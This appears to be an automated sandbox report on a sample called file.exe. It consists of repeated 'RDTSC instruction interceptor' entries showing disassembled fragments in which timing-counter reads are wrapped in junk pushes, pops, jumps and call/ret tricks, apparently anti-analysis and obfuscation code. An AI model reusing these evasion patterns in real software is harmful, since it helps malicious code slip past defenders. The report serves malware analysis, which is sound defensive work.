Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596AE2 second address: 596B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F239852C05Ah 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F239852C05Eh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a ja 00007F239852C05Ch 0x00000020 pop eax 0x00000021 lea ebx, dword ptr [ebp+124588D4h] 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F239852C058h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 xchg eax, ebx 0x00000042 push edi 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596BE0 second address: 596C0A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2398D03458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F2398D03466h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596C0A second address: 596C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596C1B second address: 596C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596C1F second address: 596C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F239852C068h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596C3F second address: 596C9C instructions: 0x00000000 rdtsc 0x00000002 js 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F2398D0345Fh 0x00000014 pop eax 0x00000015 movsx edx, cx 0x00000018 push 00000003h 0x0000001a xor dword ptr [ebp+122D22E6h], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F2398D03458h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c push 00000003h 0x0000003e mov edx, edi 0x00000040 call 00007F2398D03459h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C3F second address: 596C9C instructions: 0x00000000 rdtsc 0x00000002 js 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F2398D0345Fh 0x00000014 pop eax 0x00000015 movsx edx, cx 0x00000018 push 00000003h 0x0000001a xor dword ptr [ebp+122D22E6h], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F2398D03458h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c push 00000003h 0x0000003e mov edx, edi 0x00000040 call 00007F2398D03459h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596C9C second address: 596CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596CA1 second address: 596CCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jmp 00007F2398D03468h 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596CCD second address: 596CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E2D second address: 596E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E31 second address: 596E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E37 second address: 596E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e mov dx, E7BAh 0x00000012 mov di, E700h 0x00000016 push 09D9EBE9h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F2398D03456h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E66 second address: 596F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F239852C060h 0x0000000e popad 0x0000000f xor dword ptr [esp], 09D9EB69h 0x00000016 mov esi, 14BA0E3Bh 0x0000001b push 00000003h 0x0000001d or ecx, dword ptr [ebp+122D3751h] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 jbe 00007F239852C058h 0x0000002c pushad 0x0000002d popad 0x0000002e pop ecx 0x0000002f push 00000003h 0x00000031 call 00007F239852C05Dh 0x00000036 jc 00007F239852C056h 0x0000003c pop edx 0x0000003d push 90D23855h 0x00000042 pushad 0x00000043 push esi 0x00000044 jmp 00007F239852C05Eh 0x00000049 pop esi 0x0000004a jmp 00007F239852C066h 0x0000004f popad 0x00000050 add dword ptr [esp], 2F2DC7ABh 0x00000057 lea ebx, dword ptr [ebp+124588E8h] 0x0000005d jmp 00007F239852C05Fh 0x00000062 push edi 0x00000063 movzx esi, ax 0x00000066 pop edi 0x00000067 xchg eax, ebx 0x00000068 jg 00007F239852C060h 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7BFE second address: 5B7C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7C03 second address: 5B7C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jo 00007F239852C05Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6068 second address: 5B606D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6457 second address: 5B645B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6579 second address: 5B6588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F2398D0345Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6588 second address: 5B659C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jne 00007F239852C05Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B659C second address: 5B65A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B682A second address: 5B6830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6830 second address: 5B68A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Eh 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2398D03469h 0x00000012 pop edi 0x00000013 jmp 00007F2398D03468h 0x00000018 push ebx 0x00000019 jmp 00007F2398D03461h 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F2398D03463h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B68A3 second address: 5B68AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B68AB second address: 5B68B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F5CF second address: 57F5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F239852C056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F5DB second address: 57F5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6E19 second address: 5B6E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76AE second address: 5B76E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Fh 0x00000009 jng 00007F2398D03456h 0x0000000f jc 00007F2398D03456h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c jns 00007F2398D0345Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7822 second address: 5B7828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7828 second address: 5B7833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7833 second address: 5B7837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA626 second address: 5AA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2398D03456h 0x0000000a pushad 0x0000000b js 00007F2398D03456h 0x00000011 jmp 00007F2398D03464h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7AD7 second address: 5B7AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F239852C056h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7AE3 second address: 5B7AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9304 second address: 5B9326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Eh 0x00000007 jne 00007F239852C056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F239852C05Eh 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DAA2 second address: 57DAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDD08 second address: 5BDD52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C066h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007F239852C069h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F239852C056h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDD52 second address: 5BDD66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c jo 00007F2398D0345Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDF6E second address: 5BDF86 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jc 00007F239852C056h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDF86 second address: 5BDF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2398D03456h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C315A second address: 5C315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C315E second address: 5C317D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F2398D0345Eh 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F2398D03456h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C54F3 second address: 5C5503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C05Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5503 second address: 5C5507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C29 second address: 5C5C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C2D second address: 5C5C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C33 second address: 5C5C4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F239852C05Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007F239852C05Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C4D second address: 5C5C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C55 second address: 5C5C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C986A second address: 5C9874 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2398D0345Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8FF5 second address: 5C9000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F239852C056h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9000 second address: 5C9006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9006 second address: 5C900A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CAC11 second address: 5CAC16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C900A second address: 5C9024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F239852C05Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CAE46 second address: 5CAE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D22E6h], eax 0x0000000f push 00000000h 0x00000011 add dword ptr [ebp+124854E5h], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F2398D03458h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 stc 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9024 second address: 5C902A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CAE87 second address: 5CAE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB89A second address: 5CB8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB96C second address: 5CB972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC3A2 second address: 5CC3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C069h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC3BF second address: 5CC44B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F2398D03458h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, esi 0x0000002b push 00000000h 0x0000002d mov di, si 0x00000030 mov esi, dword ptr [ebp+122D3729h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F2398D03458h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov di, si 0x00000055 pushad 0x00000056 jmp 00007F2398D03465h 0x0000005b mov eax, 0C5A0291h 0x00000060 popad 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F2398D03460h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC14C second address: 5CC151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC44B second address: 5CC465 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2398D0345Ch 0x00000008 jng 00007F2398D03456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F2398D03456h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC465 second address: 5CC46E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CCF30 second address: 5CCF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CCF34 second address: 5CCF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CCF3A second address: 5CCF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F2398D03456h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD827 second address: 5CD831 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2748 second address: 5D274C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD831 second address: 5CD838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D274C second address: 5D2752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CECB second address: 58CECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CECF second address: 58CF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2398D03460h 0x0000000e jmp 00007F2398D03461h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2398D03463h 0x0000001c jnl 00007F2398D03456h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CF15 second address: 58CF25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F239852C056h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CF25 second address: 58CF45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2398D03466h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CF45 second address: 58CF4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F239852C056h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D32BE second address: 5D32D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F2398D03456h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4EA5 second address: 5D4EAF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F239852C05Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7D16 second address: 5D7D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7D1C second address: 5D7D42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F239852C058h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F239852C060h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F239852C056h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8C6B second address: 5D8C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03463h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
